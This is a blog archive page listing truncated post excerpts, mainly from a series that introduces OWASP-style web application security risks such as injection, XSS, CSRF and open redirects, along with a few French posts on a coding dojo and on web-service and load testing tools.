Mar 11, 2014
Ce Mardi 4 Mars 2014 avait lieu le Coding Dojo de mon équipe. Voici un petit résumé. Déroulement de la journée L’objectif principal de cette journée était de découvrir AngularJS. Autour des maîtres de cérémonies, Alvin et Alexis, j’avais avec moi douze participants hyper motivés. Après un petit-déjeuner
Lire la suite...
Jan 29, 2014
Description If a user is redirected or forwarded to a page defined by an unverified entry, the target URL can be manipulated by an attacker. This attack is used to redirect a user to a malicious website through a website with a trusted domain name (phishing) or to access an
Lire la suite...
Jan 28, 2014
Description Known software vulnerabilities are available to everyone on the Internet. If an attacker knows which components you use, he can retrieve these vulnerabilities and find a way to exploit them. Examples Somehow, an attacker found out my bank’s website uses Apache web server version 1.3.22 on
Lire la suite...
Jan 14, 2014
Description An attacker sends a request to a website you are authenticated on to execute an operation without your formal approval. Attackers usually use XSS to make you or your browser send this malicious request, but many other flaws exist to achieve the same goal. Examples Every month, to pay
Lire la suite...
Dec 09, 2013
Description In a web application with different user roles, authentication is not enough. Each request must be controlled against user’s role to ensure the user is authorized to use the requested function or access the requested page. Examples On my bank’s website, the clerk has a link in
Lire la suite...
Nov 18, 2013
Description We have seen in the previous articles that an experienced attacker can easily intercept data in transit (e.g. on a public Wifi hotspot) or have access to data stored in your database (e.g. using SQL injection). If the stolen information is sensitive (password, credit card number, personal
Lire la suite...
Nov 14, 2013
Description Nowadays, besides the operating system and the JRE, most of the Java applications are based on third-party frameworks, open-source or proprietary. Moreover, a web application is deployed on an application server (or a servlet container). All these components represent a lot of potential risks an attacker can use if
Lire la suite...
Nov 04, 2013
Description The application exposes a direct reference (functional identifier, database key, file path…) to a resource. Thanks to that direct reference, an attacker can guess other direct references and access to other resources. Usually, you will find direct references in links and selection lists (drop-down list, radio buttons and checkboxes)
Lire la suite...
Oct 28, 2013
Description Cross-Site Scripting is a specific consequence of an injection attack. The goal is to make a web browser execute arbitrary scripting code (Javascript, ActionScript, ActiveX…) usually to steal personal information. Examples Persistent XSS attack The attacker’s bank website proposes a messaging service to communicate with the clerk. The
Lire la suite...
Oct 21, 2013
Description The attacker steals his victim’s credentials or any information that will help him impersonating the victim on your application. Examples Client attack To authenticate on my bank website, my password is very simple to remember, it’s my birthdate. But I want to change it with my wife’
Lire la suite...
Oct 11, 2013
Description The attacker sends untrusted data that will be injected in the targeted application to change its behaviour. The goal of this attack is usually to steal data but it can also be used to delete or corrupt your data or result in denial of service. Example I’m connected
Lire la suite...
Oct 10, 2013
When starting a new web application, the security risks are sadly often underestimated by everyone (developers, architects, IT, managers…). Web applications are more vulnerable to attacks compared to standalone applications as they usually expose a service over a network to a potentially large population of users. Of course, the risk
Lire la suite...
Feb 22, 2008
Pour tester des web services, il n’existe pas énormément de solutions open-source. Je vous en propose 2 en fonction du type de tests que vous souhaitez réaliser. Apache JMeter est l’outil open-source de tests connu et reconnu. Il est généralement utilisé pour tester les performances et la montée
Lire la suite...
Feb 22, 2008
Ceux qui ont déjà exécuté des tests de charge, savent que la machine cliente (celle qui simule les utilisateurs) est aussi importante que le serveur testé. Si la machine cliente est incapable de simuler correctement le nombre d’utilisateurs voulu à cause d’un processeur trop faible, d’un manque
Lire la suite...